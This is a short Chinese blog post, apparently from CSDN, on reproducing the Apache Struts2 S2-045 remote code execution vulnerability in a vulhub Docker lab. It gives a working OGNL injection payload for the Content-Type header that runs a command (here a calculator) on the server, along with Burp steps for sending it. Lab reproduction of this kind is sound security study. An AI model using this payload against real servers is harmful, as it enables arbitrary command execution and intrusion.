https://blog.csdn.net/qq_36374896/article/details/84145020

漏洞复现

进入漏洞环境 (048和045一样)

cd vulhub-master/struts2/s2-048/  

S2-045(RCE远程代码执行)

启动s2-048环境:

sudo docker-compose up

S2-045(RCE远程代码执行)

Payload

Content-Type:~multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc')};

使用burp抓取访问包:
S2-045(RCE远程代码执行)
将其改为POST方法,并将Payload写入HTTP头部,下方随意加入一些POST的数据
S2-045(RCE远程代码执行)
服务器端已经弹出了计算器:
S2-045(RCE远程代码执行)

相关文章:

  • 2021-07-30
  • 2021-04-20
  • 2021-11-26
  • 2021-10-14
  • 2023-01-11
  • 2021-04-24
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-05-27
  • 2022-12-23
  • 2021-09-29
  • 2021-10-30
  • 2021-04-26
  • 2021-06-02
  • 2021-08-16
相关资源
相似解决方案